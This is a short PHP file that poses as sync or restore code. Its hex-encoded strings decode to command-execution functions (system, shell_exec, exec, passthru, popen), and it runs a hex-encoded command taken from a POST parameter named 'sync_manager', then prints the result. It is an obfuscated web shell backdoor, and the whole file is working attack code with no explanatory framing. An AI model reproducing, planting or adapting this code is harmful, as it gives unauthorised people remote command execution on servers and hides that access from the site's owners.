<?php


$rec1 = '7';
$rec2 = '3';
$rec3 = '6';
$rec4 = '8';
$rec5 = '5';
$rec6 = 'c';
$rec7 = '0';
$rec8 = '1';
$rec9 = '4';
$rec10 = 'f';
$rec11 = 'e';
$rec12 = 'd';
$rec13 = '9';
$restore_state1 = pack("H*", '7' . '3' . $rec1 . '9' . '7' . $rec2 . $rec1 . '4' . $rec3 . '5' . '6' . 'd');
$restore_state2 = pack("H*", $rec1 . $rec2 . '6' . $rec4 . '6' . $rec5 . $rec3 . $rec6 . $rec3 . $rec6 . $rec5 . 'f' . $rec3 . '5' . '7' . $rec4 . '6' . '5' . $rec3 . $rec2);
$restore_state3 = pack("H*", '6' . '5' . '7' . '8' . '6' . '5' . '6' . '3');
$restore_state4 = pack("H*", '7' . $rec7 . '6' . $rec8 . '7' . '3' . $rec1 . $rec2 . '7' . $rec9 . $rec3 . '8' . '7' . '2' . '7' . $rec5);
$restore_state5 = pack("H*", '7' . '0' . '6' . $rec10 . $rec1 . '0' . '6' . $rec5 . $rec3 . $rec11);
$restore_state6 = pack("H*", '7' . '3' . $rec1 . '4' . '7' . '2' . $rec3 . '5' . '6' . $rec8 . '6' . $rec12 . '5' . $rec10 . '6' . $rec1 . $rec3 . $rec5 . $rec1 . $rec9 . $rec5 . 'f' . '6' . '3' . $rec3 . 'f' . $rec3 . $rec11 . $rec1 . $rec9 . $rec3 . $rec5 . '6' . $rec11 . '7' . $rec9 . $rec1 . $rec2);
$restore_state7 = pack("H*", $rec1 . '0' . $rec3 . '3' . $rec3 . $rec6 . '6' . 'f' . '7' . $rec2 . '6' . '5');
$sync_manager = pack("H*", $rec1 . '3' . $rec1 . $rec13 . $rec3 . $rec11 . $rec3 . $rec2 . '5' . 'f' . $rec3 . $rec12 . '6' . '1' . $rec3 . 'e' . $rec3 . '1' . '6' . '7' . '6' . '5' . '7' . '2');
if (isset($_POST[$sync_manager])) {
    $sync_manager = pack("H*", $_POST[$sync_manager]);
    if (function_exists($restore_state1)) {
        $restore_state1($sync_manager);
    } elseif (function_exists($restore_state2)) {
        print $restore_state2($sync_manager);
    } elseif (function_exists($restore_state3)) {
        $restore_state3($sync_manager, $bind_ent);
        print join("\n", $bind_ent);
    } elseif (function_exists($restore_state4)) {
        $restore_state4($sync_manager);
    } elseif (function_exists($restore_state5) && function_exists($restore_state6) && function_exists($restore_state7)) {
        $reference_resource = $restore_state5($sync_manager, 'r');
        if ($reference_resource) {
            $token_item = $restore_state6($reference_resource);
            $restore_state7($reference_resource);
            print $token_item;
        }
    }
    exit;
}
